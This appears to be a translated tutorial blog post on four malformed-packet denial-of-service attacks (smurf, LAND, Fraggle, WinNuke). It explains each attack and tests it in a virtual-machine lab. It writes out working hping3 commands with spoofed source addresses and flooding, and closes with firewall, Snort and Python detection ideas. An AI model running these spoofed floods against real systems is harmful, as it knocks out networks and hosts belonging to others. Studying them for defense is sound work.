Malformed packet attacks (1)
0x01 Foreword
I have been following CTF material outside of work recently, and then played Werewolf with friends until dark, so I almost forgot to write up my research on malformed packet attacks. This article covers the smurf attack, the LAND attack, the Fraggle attack and the WinNuke attack. There are others, such as the teardrop attack and attacks using the IP record-route option, but they are not covered here, otherwise the article would run too long.
0X02 Attack Principle Introduction
Smurf attack
The smurf attack is also called an ICMP amplification attack. It abuses the way broadcast packets are handled: the attacker impersonates the victim host and sends ICMP packets whose destination address is the broadcast address of the network (here 192.168.4.255). When the gateway receives such a packet it forwards it to every host on the network, and every host then sends an ICMP reply to the victim.
Harm
A smurf attack causes every host on the network to send ICMP replies to the victim, which congests the network; the traffic is several orders of magnitude higher than an ordinary ping. A more elaborate variant sets the source address to a third-party victim, so that the third party is eventually brought down, much like an amplifier.
LAND attack
The LAND attack uses a specially constructed TCP SYN packet (normally used to open a new connection) in which both the source and destination address are the target's own IP address. The target opens an empty connection to itself and keeps responding to itself, consuming system resources until it crashes. This is not the same as a SYN flood attack.
Harm
The LAND attack causes the victim to respond to itself continuously, consuming system resources until it crashes.
Fraggle attack
The attacker sends UDP packets into the network where the target is located. The packet's source address is the address of the targeted host, the destination address is the broadcast address or subnet address of the target's subnet, and the destination port is 7 or 19. Every system in the subnet with these services enabled sends a response to the targeted host, generating a large amount of traffic that fills the bandwidth, so the victim's network becomes congested or the victim host crashes.
Harm
Fraggle attacks are similar to smurf attacks: they occupy bandwidth and cause network congestion.
WinNuke attack
WinNuke exploits an OOB (out-of-band data) vulnerability in the NetBIOS protocol. Its principle is to send a TCP packet carrying urgent data to port 137, 138 or 139 of the target computer. When Windows 95 / NT receives this packet it immediately freezes or shows a blue screen, and TCP/IP networking cannot be used again until the computer is restarted.
Harm
Older operating systems (Windows 95 / NT) freeze or blue-screen immediately upon receiving this packet and have to be restarted.
0X03 Attack test
Preparation: one Kali virtual machine (attacker), one Ubuntu virtual machine (victim)
Tool: hping3
Smurf attack
Attacker:
Victim:
The attacker sends smurf attack packets into the victim's network:
hping3 --icmp 192.168.146.255 -a 192.168.146.128 --flood
Set the destination address to the broadcast address.
Set the source address to the victim's address; -a spoofs the packet's source address.
Ubuntu packet capture analysis
The following capture shows that the attacker impersonates the victim and sends ICMP packets to the broadcast address; the victim itself sent no ICMP packets. After the smurf attack, the other devices send ICMP reply packets to the victim, and once the packet volume reaches a certain level the network becomes congested.
LAND attack
Kali attack
The LAND attack uses the self-response behaviour: it sends the victim packets that make it respond to itself.
hping3 192.168.146.128 -p 22 -n -S -a 192.168.146.128 --flood
-p destination port  -n numeric output (no name resolution)  -S send SYN
All that is needed here is for the packet's source address and destination address to be the same.
Ubuntu packet capture analysis: viewing the capture in Wireshark, you can see the victim sending TCP SYN packets to itself.
Fraggle attack
Kali attack
The Fraggle attack uses the rarely used UDP ports 7 and 19: the attacker spoofs the victim's address and sends UDP packets to the broadcast address.
hping3 192.168.146.255 -a 192.168.146.128 -s 7 -p 19 --flood
-s source port
-p destination port
Ubuntu packet capture analysis: in Wireshark the capture looks very similar to the smurf attack, except that one uses UDP packets and the other ICMP packets; both are sent to the broadcast address.
WinNuke attack
Kali attack
This attack sends TCP packets with the URG (urgent) flag set to port 137 of the target computer.
hping3 -p 137 -U 192.168.146.128
0X03 How to protect
1. Use a firewall to filter the different attacks, blocking the corresponding packets with firewall rules.
2. You can also use Snort as an IPS to block these kinds of attacks.
LAND attack Snort detection rules
Fraggle attack Snort detection rules
WinNuke attack Snort detection rules
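As an added example that is not part of the original post, the following Python sketch applies the same four signatures a Snort rule would match (source equals destination with SYN, ICMP echo request to the broadcast address, UDP to port 7/19 on the broadcast address, URG data to a NetBIOS port) to packet summaries and counts hits per source. The packet dict schema, the function names and the sample packets are this example's own constructions modelled on the lab addresses above.

```python
import ipaddress
from collections import Counter

ECHO_PORTS = {7, 19}             # UDP ports Fraggle aims at (echo, chargen)
NETBIOS_PORTS = {137, 138, 139}  # ports WinNuke sends urgent (URG) data to

def is_broadcast(addr, local_net):
    """True if addr is the directed broadcast address of local_net."""
    return ipaddress.ip_address(addr) == ipaddress.ip_network(local_net).broadcast_address

def classify(pkt, local_net):
    """Return the attack a packet summary matches, or None. The dict schema
    (src, dst, proto, dport, flags, type) is this example's own assumption."""
    proto, src, dst = pkt["proto"], pkt["src"], pkt["dst"]
    flags = pkt.get("flags", set())
    if proto == "tcp" and src == dst and "SYN" in flags:
        return "land"      # SYN whose source address is the target itself
    if proto == "icmp" and pkt.get("type") == 8 and is_broadcast(dst, local_net):
        return "smurf"     # echo request aimed at the broadcast address
    if proto == "udp" and pkt["dport"] in ECHO_PORTS and is_broadcast(dst, local_net):
        return "fraggle"   # UDP to port 7 or 19 on the broadcast address
    if proto == "tcp" and "URG" in flags and pkt["dport"] in NETBIOS_PORTS:
        return "winnuke"   # out-of-band data to a NetBIOS port
    return None

def summarize(packets, local_net):
    """Count hits per (attack, source address). For smurf and Fraggle the
    source is the spoofed victim that will receive the reflected replies."""
    hits = Counter()
    for pkt in packets:
        attack = classify(pkt, local_net)
        if attack:
            hits[(attack, pkt["src"])] += 1
    return hits

# Constructed packet summaries modelled on the lab in the post, not a real capture.
SAMPLE = [
    {"proto": "icmp", "type": 8, "src": "192.168.146.128", "dst": "192.168.146.255"},
    {"proto": "icmp", "type": 0, "src": "192.168.146.130", "dst": "192.168.146.128"},
    {"proto": "tcp", "src": "192.168.146.128", "dst": "192.168.146.128", "dport": 22, "flags": {"SYN"}},
    {"proto": "udp", "src": "192.168.146.128", "dst": "192.168.146.255", "sport": 7, "dport": 19},
    {"proto": "tcp", "src": "192.168.146.1", "dst": "192.168.146.128", "dport": 137, "flags": {"URG", "PSH", "ACK"}},
    {"proto": "tcp", "src": "192.168.146.1", "dst": "192.168.146.128", "dport": 22, "flags": {"SYN"}},  # benign SSH SYN
]

if __name__ == "__main__":
    for (attack, src), n in summarize(SAMPLE, "192.168.146.0/24").items():
        print(f"{attack:8} from {src}: {n} packet(s)")
```

In a real deployment the per-source counts would be compared against a rate threshold, since a single spoofed broadcast packet is already suspicious but the flood is what causes the congestion described above.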
0X04 Summary
This article describes four kinds of malformed packet attacks (smurf, LAND, Fraggle and WinNuke). Each attack has its own characteristics, and studying the underlying protocols helps in understanding them.
The best time to plant a tree was ten years ago; the next best time is now. I hope not to squander my youth.